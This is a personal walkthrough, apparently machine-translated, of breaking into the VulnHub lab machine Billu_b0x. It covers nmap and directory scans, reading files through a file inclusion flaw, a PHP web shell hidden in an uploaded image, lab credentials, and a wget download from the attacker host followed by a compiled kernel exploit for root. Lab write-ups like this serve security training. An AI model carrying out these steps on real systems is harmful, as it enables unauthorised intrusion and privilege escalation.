VulnHub range of Billu_b0x
emmm, long time no play drone experiment, and play it today! !
Vm opened with drones, the network adapter changed to NAT, and then run kali drone
first affirmed View kali's ip address, and then use nmap command: nmap -sP 192.168.80.0/24
scan hosts
found the IP address of the drone, the next port scan
nmap command : nmap -p 1-65535 -sV 192.168.80.129
open two ports! ! Not control port 22, about 80 direct access to the port:
enter the main page to get a prompt sql injection? ? ? Use the universal password and failed attempts to log ,,,
only to give up, to see if there is no follow-up ideas just come back to continue, the first information collection! !
Use dirbuster and dirb two blast with the look directory
dirbuster scan results:
Dir found: /cgi-bin/ - 403
File found: /index.php - 200
Dir found: /icons/ - 403
File found: /c.php - 200
File found: /in.php - 200
File found: /show.php - 200
Dir found: /doc/ - 403
File found: /add.php - 200
File found: /test.php - 200
Dir found: /icons/small/ - 403
File found: /head.php - 200
Dir found: /uploaded_images/ - 200
File found: /uploaded_images/c.JPG - 200
File found: /uploaded_images/CaptBarbossa.JPG - 200
File found: /panel.php - 302
File found: /head2.php - 200
Dir found: /server-status/ - 403
dirb scan results:
---- Scanning URL: http://192.168.80.129/ ----
+ http://192.168.80.129/add (CODE:200|SIZE:307)
+ http://192.168.80.129/c (CODE:200|SIZE:1)
+ http://192.168.80.129/cgi-bin/ (CODE:403|SIZE:290)
+ http://192.168.80.129/head (CODE:200|SIZE:2793)
==> DIRECTORY: http://192.168.80.129/images/
+ http://192.168.80.129/in (CODE:200|SIZE:47554)
+ http://192.168.80.129/index (CODE:200|SIZE:3267)
+ http://192.168.80.129/panel (CODE:302|SIZE:2469)
==> DIRECTORY: http://192.168.80.129/phpmy/
+ http://192.168.80.129/server-status (CODE:403|SIZE:295)
+ http://192.168.80.129/show (CODE:200|SIZE:1)
+ http://192.168.80.129/test (CODE:200|SIZE:72)
==> DIRECTORY: http://192.168.80.129/uploaded_images/
+ http://192.168.80.129/phpmy/ChangeLog (CODE:200|SIZE:28878)
+ http://192.168.80.129/phpmy/LICENSE (CODE:200|SIZE:18011)
+ http://192.168.80.129/phpmy/README (CODE:200|SIZE:2164)
+ http://192.168.80.129/phpmy/TODO (CODE:200|SIZE:190)
+ http://192.168.80.129/phpmy/changelog (CODE:200|SIZE:8367)
==> DIRECTORY: http://192.168.80.129/phpmy/contrib/
+ http://192.168.80.129/phpmy/docs (CODE:200|SIZE:2781)
+ http://192.168.80.129/phpmy/export (CODE:200|SIZE:8367)
+ http://192.168.80.129/phpmy/favicon (CODE:200|SIZE:18902)
+ http://192.168.80.129/phpmy/favicon.ico (CODE:200|SIZE:18902)
+ http://192.168.80.129/phpmy/import (CODE:200|SIZE:8367)
+ http://192.168.80.129/phpmy/index (CODE:200|SIZE:8367)
==> DIRECTORY: http://192.168.80.129/phpmy/js/
==> DIRECTORY: http://192.168.80.129/phpmy/libraries/
+ http://192.168.80.129/phpmy/license (CODE:200|SIZE:8367)
==> DIRECTORY: http://192.168.80.129/phpmy/locale/
+ http://192.168.80.129/phpmy/main (CODE:200|SIZE:8367)
+ http://192.168.80.129/phpmy/navigation (CODE:200|SIZE:8367)
+ http://192.168.80.129/phpmy/phpinfo (CODE:200|SIZE:8367)
+ http://192.168.80.129/phpmy/phpmyadmin (CODE:200|SIZE:42380)
==> DIRECTORY: http://192.168.80.129/phpmy/pmd/
+ http://192.168.80.129/phpmy/print (CODE:200|SIZE:1064)
+ http://192.168.80.129/phpmy/robots (CODE:200|SIZE:26)
+ http://192.168.80.129/phpmy/robots.txt (CODE:200|SIZE:26)
==> DIRECTORY: http://192.168.80.129/phpmy/scripts/
==> DIRECTORY: http://192.168.80.129/phpmy/setup/
+ http://192.168.80.129/phpmy/sql (CODE:200|SIZE:8367)
==> DIRECTORY: http://192.168.80.129/phpmy/themes/
+ http://192.168.80.129/phpmy/url (CODE:200|SIZE:8367)
+ http://192.168.80.129/phpmy/webapp (CODE:200|SIZE:6917)
+ http://192.168.80.129/phpmy/setup/config (CODE:303|SIZE:0)
==> DIRECTORY: http://192.168.80.129/phpmy/setup/frames/
+ http://192.168.80.129/phpmy/setup/index (CODE:200|SIZE:12970)
==> DIRECTORY: http://192.168.80.129/phpmy/setup/lib/
+ http://192.168.80.129/phpmy/setup/scripts (CODE:200|SIZE:5169)
+ http://192.168.80.129/phpmy/setup/styles (CODE:200|SIZE:6941)
+ http://192.168.80.129/phpmy/setup/validate (CODE:200|SIZE:10)
-----------------
END_TIME: Mon Nov 11 04:50:43 2019
There are many suspicious directory found!
First visit about phpmy directory to see whether phpmyadmin page:
it really is, first put aside, and then one by one to access the page, the first visit c.php, blank page
visit in.php, found phpinfo, but it seems there is a file that contains vulnerabilities:
show.php nothing, a blank page, add.php like a file upload page:
visit what test.php got a tip! ! !
file parameters? ? ? This is not exactly what I wanted and files contain loopholes match? ? Get parameter passing, not ,, guess is that post, success:
good, then you can take advantage of what this file contains the vulnerability to view the contents of other documents the
c.php, show.php, in.php, index.php, add. php, head.php, panel.php
think there is a phpmyadmin page, first of all to read about phpmyadmin configuration file, see if you can find the login ID and password:
similar account password, or the root? Try to log phpmyadmin, fail, try ssh connection, after all, is the root
did not expect immediate success landing ,,,,:
completion of the experiment? ? ? ? Or continue to play the next go ,,, phpmyadmin not yet successful landing
view show.php it was found, it seems that database queries? ? :
Look c.php, find a user name and password, first down billu\b0x_billu
and so you finish viewing the page to try again to phpmyadmin to see if the account password, avoid trouble:
add.php is a static page, there is no upload function ,, ,,
panel.php like is to get home after a successful landing page, first put aside:
There are two head pages are displayed Picture, learned a lot of information after reading
the main thing is the user name and the page on c.php password, try whether phpmyadmin login password
directly to try landing was successful:
after a simple collection, found a username and password biLLu\hEx_it
:
recall that we had just need to log into the page is, and guess this is the user name and password, go to login attempt was successful:
find a place to upload an increase in the user's page! !
Go look at the source code for uploading and found loopholes:
look at the source code we know, horses can upload a picture, and then use the file contains! !
Bypassing the file header, followed by the word Trojan:
successful implementation:
this easy to handle, can execute php code of the picture, and not just on a shooting range about the same? ?
Direct phpshell script wave!
Get shell:
using python access to standard shell: python -c 'import pty; pty.spawn("/bin/bash")'
a look at the kernel:
emmmm, is ubuntu or 14 years ,, continue to raise cattle dirty right? ?
It was found that dirty cow virtual machine does not work ,,,, direct collapse? ? Still I waited long enough? ? Well to put it another bar
using cat / etc / issue check the version number:
direct Find exp:
You can not create files in the directory, switch to the up / down tmp, kali open the service, and move files to the root of the site:
vim /etc/apache2/ports.conf
/etc/init.d/apache2 start
cp /usr/share/exploitdb/exploits/linux/local/37292.c /var/www/html
Download file: wget 192.168.80.128:8888/37292.c
compiled executable file:
gcc -pthread 37292.c -o 37292 -lcrypt
./37292
Successfully got root access, completion of the experiment! ! With exactly the same before we ssh connection ,,,,
seemingly no flag, goodbye ~~
to sum up
This experiment in general and on a similar experiment, the file contains, and then rebound shell
most important thing is to know the method to mention the right to want to change, not a road go to die, put right when not dirty cattle
should think of other ways, For example, directly to Ubuntu exploits! !
Blessings, this experiment also learned a lot in the future ~ ~ hope to continue their efforts! ! ! ! Come on!